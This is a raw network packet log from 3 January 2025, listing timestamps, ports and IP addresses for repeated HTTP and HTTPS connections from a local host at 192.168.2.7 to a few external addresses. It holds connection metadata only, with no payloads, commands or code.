Jan 3, 2025 09:21:16.094224930 CET	49738	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:16.094965935 CET	49738	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:16.104341030 CET	49740	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:16.109165907 CET	80	49740	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:16.109425068 CET	49740	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:16.109580994 CET	49740	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:16.114339113 CET	80	49740	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:16.779810905 CET	80	49740	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:16.781930923 CET	49746	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:16.781979084 CET	443	49746	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:16.782062054 CET	49746	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:16.782896996 CET	49746	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:16.782912970 CET	443	49746	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:16.828880072 CET	49740	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:17.252110004 CET	443	49746	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:17.254141092 CET	49746	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:17.254160881 CET	443	49746	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:17.391886950 CET	443	49746	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:17.391980886 CET	443	49746	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:17.392092943 CET	49746	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:17.392705917 CET	49746	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:17.398845911 CET	49740	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:17.400103092 CET	49752	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:17.403826952 CET	80	49740	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:17.403920889 CET	49740	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:17.404961109 CET	80	49752	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:17.405034065 CET	49752	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:17.405138969 CET	49752	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:17.409869909 CET	80	49752	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:18.081995964 CET	80	49752	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:18.083328962 CET	49758	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:18.083375931 CET	443	49758	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:18.083532095 CET	49758	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:18.083879948 CET	49758	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:18.083894968 CET	443	49758	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:18.125864983 CET	49752	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:18.556597948 CET	443	49758	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:18.558487892 CET	49758	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:18.558502913 CET	443	49758	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:18.691663980 CET	443	49758	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:18.691754103 CET	443	49758	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:18.691840887 CET	49758	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:18.692347050 CET	49758	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:18.698750973 CET	49752	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:18.699956894 CET	49764	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:18.703742027 CET	80	49752	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:18.703861952 CET	49752	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:18.704814911 CET	80	49764	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:18.704891920 CET	49764	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:18.704998016 CET	49764	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:18.709778070 CET	80	49764	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:19.386699915 CET	80	49764	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:19.404511929 CET	49768	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:19.404547930 CET	443	49768	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:19.404611111 CET	49768	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:19.411609888 CET	49768	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:19.411629915 CET	443	49768	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:19.438240051 CET	49764	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:19.879297018 CET	443	49768	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:19.881290913 CET	49768	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:19.881324053 CET	443	49768	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:20.007190943 CET	443	49768	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:20.007247925 CET	443	49768	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:20.007299900 CET	49768	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:20.007761002 CET	49768	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:20.015414953 CET	49764	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:20.017194986 CET	49772	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:20.020385981 CET	80	49764	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:20.020440102 CET	49764	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:20.022123098 CET	80	49772	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:20.022234917 CET	49772	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:20.022284031 CET	49772	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:20.027132988 CET	80	49772	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:20.702958107 CET	80	49772	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:20.705432892 CET	49778	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:20.705477953 CET	443	49778	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:20.705777884 CET	49778	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:20.706212044 CET	49778	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:20.706231117 CET	443	49778	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:20.750749111 CET	49772	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:21.160732985 CET	443	49778	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:21.163121939 CET	49778	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:21.163144112 CET	443	49778	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:21.295942068 CET	443	49778	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:21.296006918 CET	443	49778	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:21.296159983 CET	49778	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:21.296910048 CET	49778	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:21.308449030 CET	49772	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:21.309122086 CET	49783	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:21.313647032 CET	80	49772	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:21.313796043 CET	49772	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:21.313868999 CET	80	49783	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:21.314385891 CET	49783	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:21.314532042 CET	49783	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:21.319330931 CET	80	49783	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:21.996107101 CET	80	49783	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:21.999959946 CET	49788	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:22.000001907 CET	443	49788	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:22.000066996 CET	49788	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:22.000351906 CET	49788	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:22.000370026 CET	443	49788	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:22.047667027 CET	49783	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:22.454817057 CET	443	49788	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:22.489377022 CET	49788	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:22.489406109 CET	443	49788	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:22.599128008 CET	443	49788	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:22.599195957 CET	443	49788	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:22.599246979 CET	49788	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:22.605120897 CET	49788	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:22.651864052 CET	49783	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:22.653281927 CET	49791	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:22.656815052 CET	80	49783	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:22.656871080 CET	49783	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:22.658065081 CET	80	49791	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:22.658118963 CET	49791	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:22.658443928 CET	49791	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:22.663289070 CET	80	49791	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:23.355135918 CET	80	49791	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:23.376430035 CET	49797	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:23.376462936 CET	443	49797	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:23.376629114 CET	49797	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:23.377108097 CET	49797	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:23.377120018 CET	443	49797	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:23.407134056 CET	49791	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:23.521536112 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:23.526422024 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:23.526500940 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:23.526798964 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:23.531615973 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:23.855097055 CET	443	49797	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:23.857939959 CET	49797	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:23.857961893 CET	443	49797	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:24.016532898 CET	443	49797	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:24.016599894 CET	443	49797	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:24.016737938 CET	49797	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:24.017349958 CET	49797	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:24.106067896 CET	49791	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:24.111131907 CET	80	49791	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:24.111242056 CET	49791	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:24.115276098 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:24.115295887 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:24.115444899 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:24.115953922 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:24.115964890 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:24.227577925 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:24.234503031 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:24.239356995 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:24.452219963 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:24.500797033 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:24.754375935 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:24.754445076 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:24.757200956 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:24.757210970 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:24.757514954 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:24.760059118 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:24.807323933 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:24.831168890 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:24.831187963 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:24.831300020 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:24.847771883 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:24.847779989 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.002809048 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:25.002868891 CET	443	49806	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:25.003007889 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:25.019169092 CET	49806	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:25.327075005 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.327183962 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.328775883 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.328782082 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.329044104 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.375775099 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.394829035 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.435343027 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.513036013 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.513086081 CET	443	49812	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.513159037 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.518276930 CET	49812	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.559660912 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:25.564982891 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:25.772474051 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:25.778382063 CET	49823	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.778417110 CET	443	49823	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.778657913 CET	49823	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.779139042 CET	49823	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:25.779146910 CET	443	49823	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:25.813328981 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:26.254791975 CET	443	49823	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:26.264625072 CET	49823	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:26.264636993 CET	443	49823	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:26.402951956 CET	443	49823	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:26.403007984 CET	443	49823	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:26.403074026 CET	49823	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:26.403832912 CET	49823	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:26.416661024 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:26.418087959 CET	49827	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:26.423397064 CET	80	49802	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:26.423497915 CET	49802	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:26.424614906 CET	80	49827	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:26.424712896 CET	49827	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:26.425946951 CET	49827	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:26.430759907 CET	80	49827	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:27.112889051 CET	80	49827	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:27.128251076 CET	49833	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:27.128281116 CET	443	49833	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:27.128386021 CET	49833	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:27.132071972 CET	49833	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:27.132083893 CET	443	49833	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:27.157041073 CET	49827	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:27.604187012 CET	443	49833	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:27.619990110 CET	49833	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:27.620013952 CET	443	49833	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:27.754375935 CET	443	49833	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:27.754441023 CET	443	49833	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:27.754573107 CET	49833	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:27.755053997 CET	49833	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:27.760987043 CET	49827	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:27.762478113 CET	49838	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:27.765949011 CET	80	49827	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:27.766022921 CET	49827	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:27.767376900 CET	80	49838	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:27.767469883 CET	49838	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:27.767579079 CET	49838	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:27.772296906 CET	80	49838	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:28.465863943 CET	80	49838	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:28.467521906 CET	49844	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:28.467561007 CET	443	49844	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:28.468235016 CET	49844	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:28.468497992 CET	49844	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:28.468514919 CET	443	49844	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:28.516421080 CET	49838	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:28.942118883 CET	443	49844	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:28.943809032 CET	49844	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:28.943820000 CET	443	49844	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:29.088339090 CET	443	49844	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:29.088414907 CET	443	49844	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:29.088696003 CET	49844	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:29.088970900 CET	49844	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:29.097479105 CET	49849	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:29.102459908 CET	80	49849	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:29.102556944 CET	49849	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:29.102637053 CET	49849	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:29.107439041 CET	80	49849	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:29.795089960 CET	80	49849	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:29.796319008 CET	49853	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:29.796350002 CET	443	49853	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:29.796439886 CET	49853	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:29.796696901 CET	49853	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:29.796711922 CET	443	49853	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:29.839036942 CET	49849	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:30.253139019 CET	443	49853	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:30.255621910 CET	49853	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:30.255637884 CET	443	49853	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:30.401448965 CET	443	49853	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:30.401525974 CET	443	49853	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:30.401601076 CET	49853	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:30.427973986 CET	49853	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:30.447057962 CET	49849	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:30.448863029 CET	49858	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:30.451987982 CET	80	49849	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:30.452038050 CET	49849	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:30.453721046 CET	80	49858	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:30.453821898 CET	49858	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:30.454052925 CET	49858	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:30.458801985 CET	80	49858	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:31.107666016 CET	49733	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.268237114 CET	80	49858	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:31.269573927 CET	49862	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:31.269617081 CET	443	49862	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:31.269718885 CET	49862	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:31.270035982 CET	49862	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:31.270050049 CET	443	49862	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:31.313308954 CET	49858	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.740175009 CET	443	49862	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:31.742116928 CET	49862	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:31.742134094 CET	443	49862	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:31.879261017 CET	443	49862	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:31.879328012 CET	443	49862	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:31.879596949 CET	49862	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:31.888448000 CET	49862	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:31.892756939 CET	49858	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.894062042 CET	49868	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.897716999 CET	80	49858	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:31.897806883 CET	49858	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.898844957 CET	80	49868	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:31.899014950 CET	49868	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.899014950 CET	49868	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:31.903866053 CET	80	49868	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:32.570352077 CET	80	49868	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:32.571746111 CET	49874	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:32.571790934 CET	443	49874	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:32.571954966 CET	49874	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:32.572343111 CET	49874	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:32.572360039 CET	443	49874	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:32.625794888 CET	49868	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:33.024094105 CET	443	49874	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:33.026702881 CET	49874	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:33.026722908 CET	443	49874	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:33.174276114 CET	443	49874	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:33.174370050 CET	443	49874	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:33.174417973 CET	49874	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:33.177912951 CET	49874	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:33.189659119 CET	49868	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:33.191303968 CET	49879	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:33.194652081 CET	80	49868	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:33.194705009 CET	49868	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:33.196073055 CET	80	49879	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:33.196173906 CET	49879	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:33.196249008 CET	49879	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:33.200995922 CET	80	49879	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:33.866344929 CET	80	49879	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:33.867739916 CET	49884	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:33.867803097 CET	443	49884	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:33.867873907 CET	49884	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:33.868158102 CET	49884	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:33.868182898 CET	443	49884	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:33.907077074 CET	49879	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:34.331299067 CET	443	49884	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:34.333838940 CET	49884	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:34.333887100 CET	443	49884	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:34.476414919 CET	443	49884	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:34.476488113 CET	443	49884	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:34.476552010 CET	49884	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:34.476950884 CET	49884	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:34.480379105 CET	49879	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:34.481597900 CET	49888	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:34.485321045 CET	80	49879	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:34.485438108 CET	49879	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:34.486424923 CET	80	49888	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:34.486489058 CET	49888	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:34.486572027 CET	49888	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:34.491322994 CET	80	49888	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:35.158082962 CET	80	49888	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:35.159554958 CET	49893	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:35.159605980 CET	443	49893	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:35.159698963 CET	49893	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:35.159955025 CET	49893	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:35.159972906 CET	443	49893	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:35.203967094 CET	49888	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:35.631548882 CET	443	49893	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:35.635684013 CET	49893	443	192.168.2.7	188.114.96.3
